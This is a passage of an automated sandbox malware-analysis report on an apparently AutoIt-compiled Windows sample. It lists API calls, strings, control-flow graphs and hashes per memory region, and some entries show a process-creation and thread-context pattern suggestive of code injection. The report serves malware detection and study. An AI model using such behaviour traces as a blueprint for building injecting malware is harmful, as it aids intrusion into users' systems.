                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                        • String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                        • API String ID: 3170942423-1488065692
                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2148 4012c5-4012cb 2146->2148 2149 42733f-427346 2146->2149 2150 4272f4-427315 Shell_NotifyIconW 2147->2150 2151 42731a-42733a Shell_NotifyIconW 2147->2151 2148->2144 2152 427393-4273b4 Shell_NotifyIconW 2148->2152 2153 427348-427369 Shell_NotifyIconW 2149->2153 2154 42736e-42738e Shell_NotifyIconW 2149->2154 2150->2144 2151->2144 2152->2144 2153->2144 2154->2144
                                                                        APIs
                                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 3300667738-0
                                                                        • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                        • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                        • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                        APIs
                                                                          • Part of subcall function 03D98FE8: Sleep.KERNELBASE(000001F4), ref: 03D98FF9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03D99272
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2130234126.0000000003D96000.00000040.00000020.00020000.00000000.sdmp, Offset: 03D96000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d96000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: 5XHLKYA1AAYWLGZ4OSEGPOLBV7P
                                                                        • API String ID: 2694422964-2428134147
                                                                        • Opcode ID: d70242ae3e1482d64be4ce6792f8bbf935eec716ebfe40e1531eb6152e533505
                                                                        • Instruction ID: 86f0f0aa5dcfffcc2d2310901ac72cb6ca5e887c2fa2017431d97ff582daec1e
                                                                        • Opcode Fuzzy Hash: d70242ae3e1482d64be4ce6792f8bbf935eec716ebfe40e1531eb6152e533505
                                                                        • Instruction Fuzzy Hash: 46719030D04388DAEF11DBE4C854BEEBB75AF19704F044199E248BB2C0D7BA4B45CBA6
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 1607946009-824357125
                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #v
                                                                        • API String ID: 0-554117064
                                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentTerminate
                                                                        • String ID: #v
                                                                        • API String ID: 2429186680-554117064
                                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03D987A3
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D98839
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D9885B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2130234126.0000000003D96000.00000040.00000020.00020000.00000000.sdmp, Offset: 03D96000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d96000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                        • Instruction ID: fb1387db8246bb5e3e1a2afc70faec5e64599a11871d38d484834856c4ba8aab
                                                                        • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                        • Instruction Fuzzy Hash: 6A62F870A14218DBEB24CFA4C850BDEB376FF58700F1491A9D11DEB290E77A9E81CB59
                                                                        APIs
                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                        • _free.LIBCMT ref: 004295A0
                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                        • API String ID: 3938964917-3318867693
                                                                        • Opcode ID: fc8ad9049dc94ba5b93ccabce5efb04746d9842915e300131853224c507a20a4
                                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                        • Opcode Fuzzy Hash: fc8ad9049dc94ba5b93ccabce5efb04746d9842915e300131853224c507a20a4
                                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: Error:
                                                                        • API String ID: 4104443479-232661952
                                                                        • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                        • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                        APIs
                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,0040F545,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,004A90E8,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                        • String ID: X$pWH
                                                                        • API String ID: 85490731-941433119
                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                        Strings
                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe, xrefs: 00410107
                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _strcat
                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                        • API String ID: 1765576173-2245586992
                                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1794320848-0
                                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
